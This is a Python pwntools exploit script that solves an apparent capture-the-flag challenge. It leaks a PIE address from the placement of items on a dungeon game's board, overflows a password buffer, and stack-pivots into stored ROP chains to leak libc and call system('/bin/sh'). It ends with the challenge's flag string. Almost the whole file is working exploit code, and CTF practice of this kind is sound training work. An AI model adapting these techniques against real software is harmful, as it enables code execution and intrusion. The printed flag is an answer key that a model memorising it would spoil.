# This script is partially generated by Gemini.
from pwn import *
import re

context.arch = 'amd64'
context.log_level = 'debug' 
context.terminal = ['tmux', 'splitw', '-h']

# Map item names to their respective IDs as defined in the C code
ITEM_MAP = {
    "Sword": 1, "Shield": 2, "Potion": 3, "Key": 4,
    "Scroll": 5, "Amulet": 6, "Crown": 7, "Flag": 8
}

def scan_board(p):
    """
    Scans the 16x16 dungeon board using a snake-like pattern.
    Stops immediately when all 8 items are located to save moves.
    """
    found_items = {} 
    curr_x, curr_y = 0, 0

    # Check the starting position (0,0)
    p.sendline(b'look')
    process_output(p, found_items, 0, 0)

    # Snake-pattern traversal
    for y in range(16):
        if len(found_items) == 8: break

        # Eastbound on even rows, Westbound on odd rows
        if y % 2 == 0:
            direction, step_range = 'e', range(15) 
        else:
            direction, step_range = 'w', range(15) 

        # Scan the current row
        for _ in step_range:
            p.sendline(direction.encode())
            if direction == 'e': curr_x += 1
            else: curr_x -= 1

            process_output(p, found_items, curr_x, curr_y)

            # Exit early if all items found during horizontal move
            if len(found_items) == 8:
                log.success(f"All items found! Scanning halted at ({curr_x}, {curr_y})")
                return found_items, found_items[8], (curr_x, curr_y)

        # Move down to the next row
        if y < 15 and len(found_items) < 8:
            p.sendline(b's')
            curr_y += 1
            process_output(p, found_items, curr_x, curr_y)

            # Exit early if all items found after moving south
            if len(found_items) == 8:
                log.success(f"All items found! Scanning halted at ({curr_x}, {curr_y})")
                return found_items, found_items[8], (curr_x, curr_y)

    return found_items, found_items.get(8, (None, None)), (curr_x, curr_y)

def process_output(p, found_items, x, y):
    """
    Parses game output for item discoveries using regular expressions.
    """
    output = p.recvuntil(b"> ").decode()

    # Match patterns: "glimmering [Item] lies..." or "spot a [Item] here!"
    match = re.search(r"(?:glimmering|spot a) (\w+) (?:lies|here)", output)

    if match:
        item_name = match.group(1)
        if item_name in ITEM_MAP:
            item_id = ITEM_MAP[item_name]
            if item_id not in found_items:
                found_items[item_id] = (x, y)
                log.info(f"[{len(found_items)}/8] Found {item_name} (ID: {item_id}) at ({x}, {y})")

def move_towards(p, current, target):
    """
    Calculates and executes the path from current position to target coordinates.
    """
    cur_x, cur_y = current
    tar_x, tar_y = target
    log.info(f"Navigating: {current} -> {target}")

    # Horizontal adjustment
    while cur_x < tar_x:
        p.sendline(b'e'); cur_x += 1; p.recvuntil(b"> ")
    while cur_x > tar_x:
        p.sendline(b'w'); cur_x -= 1; p.recvuntil(b"> ")

    # Vertical adjustment
    while cur_y < tar_y:
        p.sendline(b's'); cur_y += 1; p.recvuntil(b"> ")
    while cur_y > tar_y:
        p.sendline(b'n'); cur_y -= 1; p.recvuntil(b"> ")

    log.success(f"Moved from {current} to {target} successfully!")

def recover_address(found_items):
    """
    Reconstructs the 64-bit main address by simulating the init_board linear probing logic.
    Each byte of the address corresponds to an item's (X,Y) coordinates.
    """
    if len(found_items) < 8: return None

    sim_board = [[0] * 16 for _ in range(16)]
    recovered_addr = 0

    # The C code iterates from byte 7 down to 0 (High to Low bytes)
    for i in range(7, -1, -1):
        target_id = i + 1
        real_x, real_y = found_items[target_id]
        found_byte = -1

        # Brute-force each byte (0x00-0xFF) to match the coordinate
        for candidate in range(256):
            x = (candidate >> 4) & 0x0F
            y = candidate & 0x0F

            # Simulate the linear probing collision handling
            while sim_board[y][x] != 0:
                x = (x + 1) % 16
                if x == 0: y = (y + 1) % 16

            if x == real_x and y == real_y:
                found_byte = candidate
                sim_board[real_y][real_x] = target_id
                break

        if found_byte != -1:
            recovered_addr |= (found_byte << (i * 8))
        else:
            log.error(f"Failed to recover byte for ID {target_id}")
            return None

    log.success(f"Leaked Main Address: {hex(recovered_addr)}")
    return recovered_addr

p = process('./chall')
gdb.attach(p, '''
    brva 0x172f
    continue
''')

# p = remote('chall.lac.tf', 31337)

# It should be noted that there is a defined 'MAX_MOVES' limit of 300 moves in the game,
# which means that we have to control the number of commands we use during the whole exploitation.

# === PHASE 1: Map Scanning ===
# 8 items are placed on the 16x16 board based on an encrypted logic of the address of the 'main' function.
# Explore the dungeon to find all 8 items.
# Returns found item dictionary, Flag coordinates, and current stopping position.
p.recvuntil(b"> ")
found_items, flag_pos, current_pos = scan_board(p)
log.success(f"Target Flag (ID 8) found at: {flag_pos}")
pause()

# === PHASE 2: PIE Calculation ===
# Reverse-engineer the 'main' function address using the item placement logic.
main_addr = recover_address(found_items)
# Calculate ELF base address based on the offset of 'main' function.
elf_base_addr = main_addr-0x1adf
log.success(f"ELF Base Address: {hex(elf_base_addr)}")
pause()

# === PHASE 3: Navigation ===
# According to the 'check_flag_password' function,
# the buffer overflow vulnerability can only be triggered when the current position is the position of the Flag item.
# Navigate from the current scan position back to the Flag item.
move_towards(p, current_pos, flag_pos)
pause()

# === PHASE 4: Exploitation (Stage 1 - Stack Pivoting for Libc Leak) ===
# The history buffer starts from elf_base_addr+0x40a0 within bss region,
# which is a sufficient area to store ROP chains and an appropriate target for stack pivoting.
# Store gadgets into the history array by sending them as commands.
p.send(p64(elf_base_addr+0x1190)[:-1])  # gadgets within 'deregister_tm_clones' function (to load a libc address into rdi for later puts)
p.recvuntil(b"> ")
p.send(p64(elf_base_addr+0x10e0)[:-1])  # puts@plt (to leak a libc address)
p.recvuntil(b"> ")
p.send(p64(elf_base_addr+0x1adf)[:-1])  # 'main' function (to return to after leak for another 'init_board')
p.recvuntil(b"> ")
# Trigger the buffer overflow in the 'check_flag_password' function via 'grab' command.
p.sendline(b'grab')
# Send the stack pivoting payload:
# 1. Fill the 16-byte buffer;
# 2. Overwrite Saved RBP with the address of our stored ROP chain in history;
# 3. Overwrite RIP with a 'leave; ret' gadget to pivot rsp to our rbp.
p.sendafter(b"Password: ", b'A'*0x10+p64(elf_base_addr+0x4918-8)+p64(elf_base_addr+0x172f)[:-1])
# Receive the leaked Libc address and calculate Libc base address.
p.recvuntil(b"  But you keep it anyway.\n\n")
glibc_e = ELF('./libc.so.6')
glibc_base_addr = u64(p.recvline().rstrip().ljust(8, b'\x00'))-glibc_e.symbols['_IO_2_1_stdout_']
log.success(f"Glibc Base Address: {hex(glibc_base_addr)}")
pause()

# === PHASE 5: Exploitation (Stage 2 - Stack Pivoting for Shell) ===
# Store gadgets into the history array by sending them as commands.
p.sendafter(b"> ", p64(glibc_base_addr+next(glibc_e.search(asm('pop rdi; ret;'), executable=True)))[:-1])
p.sendafter(b"> ", p64(glibc_base_addr+next(glibc_e.search(b'/bin/sh\x00')))[:-1])
p.sendafter(b"> ", p64(glibc_base_addr+next(glibc_e.search(asm('ret;'), executable=True)))[:-1])
p.sendafter(b"> ", p64(glibc_base_addr+glibc_e.sym.system)[:-1])
# The Flag item is always at the initial position (0,0) of the dungeon board, so there is no need to navigate again.
# Trigger the buffer overflow in the 'check_flag_password' function via 'grab' command.
p.sendline(b'grab')
# Send the stack pivoting payload:
# 1. Fill the 16-byte buffer;
# 2. Overwrite Saved RBP with the address of our stored ROP chain in history;
# 3. Overwrite RIP with a 'leave; ret' gadget to pivot rsp to our rbp.
p.sendafter(b"Password: ", b'A'*0x10+p64(elf_base_addr+0x4938-8)+p64(elf_base_addr+0x172f)[:-1])
p.recvuntil(b"  But you keep it anyway.\n\n")
log.success("Shell spawned! Accessing flag...")

p.interactive()

# lactf{Th3_835T_345T3r_399_i5_4_fl49}